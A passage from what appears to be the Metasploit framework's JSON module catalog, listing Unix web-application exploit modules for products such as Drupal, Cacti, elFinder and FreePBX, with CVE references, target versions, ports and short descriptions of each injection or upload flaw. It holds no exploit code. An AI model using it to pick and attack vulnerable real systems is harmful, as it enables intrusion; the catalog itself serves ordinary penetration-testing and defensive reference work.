"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/barracuda_img_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/barracuda_img_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/base_qry_common": {
"name": "BASE base_qry_common Remote File Include",
"full_name": "exploit/unix/webapp/base_qry_common",
"rank": 600,
"disclosure_date": "2008-06-14",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a remote file inclusion vulnerability in\n the base_qry_common.php file in BASE 1.2.4 and earlier.",
"references": [
"CVE-2006-2685",
"OSVDB-49366",
"BID-18298"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/base_qry_common.rb",
"is_install_path": true,
"ref_name": "unix/webapp/base_qry_common",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/basilic_diff_exec": {
"name": "Basilic 1.5.14 diff.php Arbitrary Command Execution",
"full_name": "exploit/unix/webapp/basilic_diff_exec",
"rank": 600,
"disclosure_date": "2012-06-28",
"type": "exploit",
"author": [
"lcashdollar",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a metacharacter injection vulnerability in the\n diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary\n commands as the www-data user account.",
"references": [
"CVE-2012-3399",
"OSVDB-83719",
"BID-54234"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/unix/webapp/basilic_diff_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/basilic_diff_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/cacti_graphimage_exec": {
"name": "Cacti graph_view.php Remote Command Execution",
"full_name": "exploit/unix/webapp/cacti_graphimage_exec",
"rank": 600,
"disclosure_date": "2005-01-15",
"type": "exploit",
"author": [
"David Maciejak <david.maciejak@kyxar.fr>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to\n 0.8.6-d are vulnerable.",
"references": [
"OSVDB-17539",
"BID-14042"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/cacti_graphimage_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/cacti_graphimage_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/cakephp_cache_corruption": {
"name": "CakePHP Cache Corruption Code Execution",
"full_name": "exploit/unix/webapp/cakephp_cache_corruption",
"rank": 600,
"disclosure_date": "2010-11-15",
"type": "exploit",
"author": [
"tdz",
"Felix Wilhelm"
],
"description": "CakePHP is a popular PHP framework for building web applications. The\n Security component of CakePHP versions 1.3.5 and earlier and 1.2.8 and\n earlier is vulnerable to an unserialize attack which could be abused to\n allow unauthenticated attackers to execute arbitrary code with the\n permissions of the webserver.",
"references": [
"OSVDB-69352",
"CVE-2010-4335",
"BID-44852",
"PACKETSTORM-95847"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/cakephp_cache_corruption.rb",
"is_install_path": true,
"ref_name": "unix/webapp/cakephp_cache_corruption",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/carberp_backdoor_exec": {
"name": "Carberp Web Panel C2 Backdoor Remote PHP Code Execution",
"full_name": "exploit/unix/webapp/carberp_backdoor_exec",
"rank": 500,
"disclosure_date": "2013-06-28",
"type": "exploit",
"author": [
"bwall(Brian Wallace) <bwallace@cylance.com>",
"connection(Luis Santana) <hacktalkblog@gmail.com>",
"Steven K <xylitol@malwareint[d0t]com>"
],
"description": "This module exploits backdoors that can be found all over the leaked\n source code of the Carberp botnet C2 Web Panel.",
"references": [
"URL-http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"carberp"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/carberp_backdoor_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/carberp_backdoor_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/citrix_access_gateway_exec": {
"name": "Citrix Access Gateway Command Execution",
"full_name": "exploit/unix/webapp/citrix_access_gateway_exec",
"rank": 600,
"disclosure_date": "2010-12-21",
"type": "exploit",
"author": [
"George D. Gal",
"Erwin Paternotte"
],
"description": "The Citrix Access Gateway provides support for multiple authentication types.\n When utilizing the external legacy NTLM authentication module known as\n ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command\n line utility to verify a user's identity and password. By embedding shell\n metacharacters in the web authentication form it is possible to execute\n arbitrary commands on the Access Gateway.",
"references": [
"CVE-2010-4566",
"OSVDB-70099",
"BID-45402",
"URL-http://www.vsecurity.com/resources/advisory/20101221-1/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/citrix_access_gateway_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/clipbucket_upload_exec": {
"name": "ClipBucket Remote Code Execution",
"full_name": "exploit/unix/webapp/clipbucket_upload_exec",
"rank": 600,
"disclosure_date": "2013-10-04",
"type": "exploit",
"author": [
"Gabby",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in ClipBucket version 2.6 and lower.\n The script \"/admin_area/charts/ofc-library/ofc_upload_image.php\" can be used to\n upload arbitrary code without any authentication. This module has been tested\n on version 2.6 on CentOS 5.9 32-bit.",
"references": [
"PACKETSTORM-123480"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Clipbucket 2.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/clipbucket_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/clipbucket_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/coppermine_piceditor": {
"name": "Coppermine Photo Gallery picEditor.php Command Execution",
"full_name": "exploit/unix/webapp/coppermine_piceditor",
"rank": 600,
"disclosure_date": "2008-01-30",
"type": "exploit",
"author": [
"Janek Vind",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the picEditor.php script of\n Coppermine Photo Gallery versions 1.4.14 and earlier. When configured to\n use the ImageMagick library, the 'quality', 'angle', and 'clipval'\n parameters are not properly escaped before being passed to the PHP\n 'exec' command.\n\n In order to reach the vulnerable 'exec' call, the input must pass\n several validation steps.\n\n The vulnerabilities actually reside in the following functions:\n\n image_processor.php: rotate_image(...)\n include/imageObjectIM.class.php: imageObject::cropImage(...)\n include/imageObjectIM.class.php: imageObject::rotateImage(...)\n include/imageObjectIM.class.php: imageObject::resizeImage(...)\n include/picmgmt.inc.php: resize_image(...)\n\n NOTE: Use of the ImageMagick library is a non-default option. However, a\n user can specify its use at installation time.",
"references": [
"CVE-2008-0506",
"OSVDB-41676",
"EDB-5019",
"URL-http://forum.coppermine-gallery.net/index.php?topic=50103.0"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/coppermine_piceditor.rb",
"is_install_path": true,
"ref_name": "unix/webapp/coppermine_piceditor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/datalife_preview_exec": {
"name": "DataLife Engine preview.php PHP Code Injection",
"full_name": "exploit/unix/webapp/datalife_preview_exec",
"rank": 600,
"disclosure_date": "2013-01-28",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a PHP code injection vulnerability DataLife Engine 9.7.\n The vulnerability exists in preview.php, due to an insecure usage of preg_replace()\n with the e modifier, which allows to inject arbitrary php code, when there is a\n template installed which contains a [catlist] or [not-catlist] tag, even when the\n template isn't in use currently. The template can be configured with the TEMPLATE\n datastore option.",
"references": [
"CVE-2013-1412",
"OSVDB-89662",
"EDB-24438",
"BID-57603",
"URL-http://karmainsecurity.com/KIS-2013-01",
"URL-http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"DataLife Engine 9.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/datalife_preview_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/datalife_preview_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/dogfood_spell_exec": {
"name": "Dogfood CRM spell.php Remote Command Execution",
"full_name": "exploit/unix/webapp/dogfood_spell_exec",
"rank": 600,
"disclosure_date": "2009-03-03",
"type": "exploit",
"author": [
"LSO <lso@hushmail.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a previously unpublished vulnerability in the\n Dogfood CRM mail function which is vulnerable to command injection\n in the spell check feature. Because of character restrictions, this\n exploit works best with the double-reverse telnet payload. This\n vulnerability was discovered by LSO and affects v2.0.10.",
"references": [
"OSVDB-54707",
"URL-http://downloads.sourceforge.net/dogfood/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/dogfood_spell_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/dogfood_spell_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/drupal_coder_exec": {
"name": "Drupal CODER Module Remote Command Execution",
"full_name": "exploit/unix/webapp/drupal_coder_exec",
"rank": 600,
"disclosure_date": "2016-07-13",
"type": "exploit",
"author": [
"Nicky Bloor <nick@nickbloor.co.uk>",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a Remote Command Execution vulnerability in the\n Drupal CODER Module. Unauthenticated users can execute arbitrary\n commands under the context of the web server user.\n\n The CODER module doesn't sufficiently validate user inputs in a script\n file that has the PHP extension. A malicious unauthenticated user can\n make requests directly to this file to execute arbitrary commands.\n The module does not need to be enabled for this to be exploited.\n\n This module was tested against CODER 2.5 with Drupal 7.5 installed on\n Ubuntu Server.",
"references": [
"URL-https://www.drupal.org/node/2765575"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/drupal_coder_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/drupal_coder_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/drupal_drupalgeddon2": {
"name": "Drupal Drupalgeddon 2 Forms API Property Injection",
"full_name": "exploit/unix/webapp/drupal_drupalgeddon2",
"rank": 600,
"disclosure_date": "2018-03-28",
"type": "exploit",
"author": [
"Jasper Mattsson",
"a2u",
"Nixawk",
"FireFart",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a Drupal property injection in the Forms API.\n\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.",
"references": [
"CVE-2018-7600",
"URL-https://www.drupal.org/sa-core-2018-002",
"URL-https://greysec.net/showthread.php?tid=2912",
"URL-https://research.checkpoint.com/uncovering-drupalgeddon-2/",
"URL-https://github.com/a2u/CVE-2018-7600",
"URL-https://github.com/nixawk/labs/issues/19",
"URL-https://github.com/FireFart/CVE-2018-7600"
],
"platform": "Linux,PHP,Unix",
"arch": "php, cmd, x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (PHP In-Memory)",
"Automatic (PHP Dropper)",
"Automatic (Unix In-Memory)",
"Automatic (Linux Dropper)",
"Drupal 7.x (PHP In-Memory)",
"Drupal 7.x (PHP Dropper)",
"Drupal 7.x (Unix In-Memory)",
"Drupal 7.x (Linux Dropper)",
"Drupal 8.x (PHP In-Memory)",
"Drupal 8.x (PHP Dropper)",
"Drupal 8.x (Unix In-Memory)",
"Drupal 8.x (Linux Dropper)"
],
"mod_time": "2019-03-05 18:58:11 +0000",
"path": "/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb",
"is_install_path": true,
"ref_name": "unix/webapp/drupal_drupalgeddon2",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"SA-CORE-2018-002",
"Drupalgeddon 2"
]
}
},
"exploit_unix/webapp/drupal_restws_exec": {
"name": "Drupal RESTWS Module Remote PHP Code Execution",
"full_name": "exploit/unix/webapp/drupal_restws_exec",
"rank": 600,
"disclosure_date": "2016-07-13",
"type": "exploit",
"author": [
"Devin Zuczek",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a Remote PHP Code Execution vulnerability in the\n Drupal RESTWS Module. Unauthenticated users can execute arbitrary code\n under the context of the web server user.\n\n RESTWS alters the default page callbacks for entities to provide\n additional functionality. A vulnerability in this approach allows\n an unauthenticated attacker to send specially crafted requests resulting\n in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7\n are affected by this issue.\n\n This module was tested against RESTWS 2.5 with Drupal 7.5 installed on\n Ubuntu Server.",
"references": [
"URL-https://www.drupal.org/node/2765567"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/drupal_restws_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/drupal_restws_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/drupal_restws_unserialize": {
"name": "Drupal RESTful Web Services unserialize() RCE",
"full_name": "exploit/unix/webapp/drupal_restws_unserialize",
"rank": 300,
"disclosure_date": "2019-02-20",
"type": "exploit",
"author": [
"Jasper Mattsson",
"Charles Fol",
"Rotem Reiss",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a PHP unserialize() vulnerability in Drupal RESTful\n Web Services by sending a crafted request to the /node REST endpoint.\n\n As per SA-CORE-2019-003, the initial remediation was to disable POST,\n PATCH, and PUT, but Ambionics discovered that GET was also vulnerable\n (albeit cached). Cached nodes can be exploited only once.\n\n Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of\n this alternate vector.\n\n Drupal < 8.5.11 and < 8.6.10 are vulnerable.",
"references": [
"CVE-2019-6340",
"URL-https://www.drupal.org/sa-core-2019-003",
"URL-https://www.drupal.org/psa-2019-02-22",
"URL-https://www.ambionics.io/blog/drupal8-rce",
"URL-https://github.com/ambionics/phpggc",
"URL-https://twitter.com/jcran/status/1099206271901798400"
],
"platform": "PHP,Unix",
"arch": "php, cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP In-Memory",
"Unix In-Memory"
],
"mod_time": "2019-04-24 11:41:30 +0000",
"path": "/modules/exploits/unix/webapp/drupal_restws_unserialize.rb",
"is_install_path": true,
"ref_name": "unix/webapp/drupal_restws_unserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"SA-CORE-2019-003"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
"unreliable-session"
]
}
},
"exploit_unix/webapp/egallery_upload_exec": {
"name": "EGallery PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/egallery_upload_exec",
"rank": 600,
"disclosure_date": "2012-07-08",
"type": "exploit",
"author": [
"Sammy FORGIT",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in EGallery 1.2 By abusing the\n uploadify.php file, a malicious user can upload a file to the egallery/ directory\n without any authentication, which results in arbitrary code execution. The module\n has been tested successfully on Ubuntu 10.04.",
"references": [
"OSVDB-83891",
"BID-54464",
"URL-http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"EGallery 1.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/egallery_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/egallery_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/elfinder_php_connector_exiftran_cmd_injection": {
"name": "elFinder PHP Connector exiftran Command Injection",
"full_name": "exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection",
"rank": 600,
"disclosure_date": "2019-02-26",
"type": "exploit",
"author": [
"Thomas Chauchefoin",
"q3rv0",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command injection vulnerability in elFinder\n versions prior to 2.1.48.\n\n The PHP connector component allows unauthenticated users to upload\n files and perform file modification operations, such as resizing and\n rotation of an image. The file name of uploaded files is not validated,\n allowing shell metacharacters.\n\n When performing image operations on JPEG files, the filename is passed\n to the `exiftran` utility without appropriate sanitization, causing\n shell commands in the file name to be executed, resulting in remote\n command injection as the web server user.\n\n The PHP connector is not enabled by default.\n\n The system must have `exiftran` installed and in `$PATH`.\n\n This module has been tested successfully on elFinder versions 2.1.47,\n 2.1.20 and 2.1.16 on Ubuntu.",
"references": [
"CVE-2019-9194",
"EDB-46481",
"URL-https://github.com/Studio-42/elFinder/releases/tag/2.1.48",
"URL-https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Auto"
],
"mod_time": "2019-03-09 04:41:51 +0000",
"path": "/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb",
"is_install_path": true,
"ref_name": "unix/webapp/elfinder_php_connector_exiftran_cmd_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/flashchat_upload_exec": {
"name": "FlashChat Arbitrary File Upload",
"full_name": "exploit/unix/webapp/flashchat_upload_exec",
"rank": 600,
"disclosure_date": "2013-10-04",
"type": "exploit",
"author": [
"x-hayben21",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability found in FlashChat\n versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload\n feature in order to upload malicious PHP files without authentication\n which results in arbitrary remote code execution as the web server user.",
"references": [
"OSVDB-98233",
"EDB-28709"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/flashchat_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/flashchat_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/foswiki_maketext": {
"name": "Foswiki MAKETEXT Remote Command Execution",
"full_name": "exploit/unix/webapp/foswiki_maketext",
"rank": 600,
"disclosure_date": "2012-12-03",
"type": "exploit",
"author": [
"Brian Carlson",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using\n a specially crafted MAKETEXT, a malicious user can execute shell commands since the\n input is passed to the Perl \"eval\" command without first being sanitized. The\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\n module. Only Foswiki sites that have user interface localization enabled\n (UserInterfaceInternationalisation variable set) are vulnerable.\n\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried.\n Also, if the FoswikiPage option isn't provided, the module will try to create a\n random page on the SandBox space. The modules has been tested successfully on\n Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.",
"references": [
"CVE-2012-6329",
"OSVDB-88410",
"URL-http://foswiki.org/Support/SecurityAlert-CVE-2012-6330"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Foswiki 1.1.5"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/unix/webapp/foswiki_maketext.rb",
"is_install_path": true,
"ref_name": "unix/webapp/foswiki_maketext",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/freepbx_config_exec": {
"name": "FreePBX config.php Remote Code Execution",
"full_name": "exploit/unix/webapp/freepbx_config_exec",
"rank": 600,
"disclosure_date": "2014-03-21",
"type": "exploit",
"author": [
"i-Hmx",
"0x00string",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.\n It's possible to inject arbitrary PHP functions and commands in the \"/admin/config.php\"\n parameters \"function\" and \"args\".",
"references": [
"CVE-2014-1903",
"OSVDB-103240",
"EDB-32214",
"URL-http://issues.freepbx.org/browse/FREEPBX-7123"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"FreePBX"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/freepbx_config_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/freepbx_config_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/generic_exec": {
"name": "Generic Web Application Unix Command Execution",
"full_name": "exploit/unix/webapp/generic_exec",
"rank": 600,
"disclosure_date": "1993-11-14",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to exploit any generic command execution vulnerability\n for CGI applications on Unix-like platforms. To use this module, specify the\n CMDURI path, replacing the command itself with XXcmdXX. This module is currently\n limited to forms vulnerable through GET requests with query parameters.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/generic_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/generic_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/get_simple_cms_upload_exec": {
"name": "GetSimpleCMS PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/get_simple_cms_upload_exec",
"rank": 600,
"disclosure_date": "2014-01-04",
"type": "exploit",
"author": [
"Ahmed Elhady Mohamed"
],
"description": "This module exploits a file upload vulnerability in GetSimple CMS. By abusing the\n upload.php file, a malicious authenticated user can upload an arbitrary file,\n including PHP code, which results in arbitrary code execution.",
"references": [
"EDB-25405",
"OSVDB-93034"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/get_simple_cms_upload_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/google_proxystylesheet_exec": {
"name": "Google Appliance ProxyStyleSheet Command Execution",
"full_name": "exploit/unix/webapp/google_proxystylesheet_exec",
"rank": 600,
"disclosure_date": "2005-08-16",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a feature in the Saxon XSLT parser used by\n the Google Search Appliance. This feature allows for arbitrary\n java methods to be called. Google released a patch and advisory to\n their client base in August of 2005 (GA-2005-08-m). The target appliance\n must be able to connect back to your machine for this exploit to work.",
"references": [
"CVE-2005-3757",
"OSVDB-20981",
"BID-15509"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/google_proxystylesheet_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/graphite_pickle_exec": {
"name": "Graphite Web Unsafe Pickle Handling",
"full_name": "exploit/unix/webapp/graphite_pickle_exec",
"rank": 600,
"disclosure_date": "2013-08-20",
"type": "exploit",
"author": [
"Charlie Eriksen",
"funkypickle"
],
"description": "This module exploits a remote code execution vulnerability in the pickle\n handling of the rendering code in the Graphite Web project between version\n 0.9.5 and 0.9.10 (both included).",
"references": [
"CVE-2013-5093",
"URL-http://ceriksen.com/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/graphite_pickle_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/graphite_pickle_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/guestbook_ssi_exec": {
"name": "Matt Wright guestbook.pl Arbitrary Command Execution",
"full_name": "exploit/unix/webapp/guestbook_ssi_exec",
"rank": 600,
"disclosure_date": "1999-11-05",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "The Matt Wright guestbook.pl <= v2.3.1 CGI script contains\n a flaw that may allow arbitrary command execution. The vulnerability\n requires that HTML posting is enabled in the guestbook.pl script, and\n that the web server must have the Server-Side Include (SSI) script\n handler enabled for the '.html' file type. By combining the script\n weakness with non-default server configuration, it is possible to exploit\n this vulnerability successfully.",
"references": [
"CVE-1999-1053",
"OSVDB-84",
"BID-776"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/guestbook_ssi_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/guestbook_ssi_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/hastymail_exec": {
"name": "Hastymail 2.1.1 RC1 Command Injection",
"full_name": "exploit/unix/webapp/hastymail_exec",
"rank": 600,
"disclosure_date": "2011-11-22",
"type": "exploit",
"author": [
"Bruno Teixeira",
"juan vazquez <juan.vazquez@metasploit.com>"
],
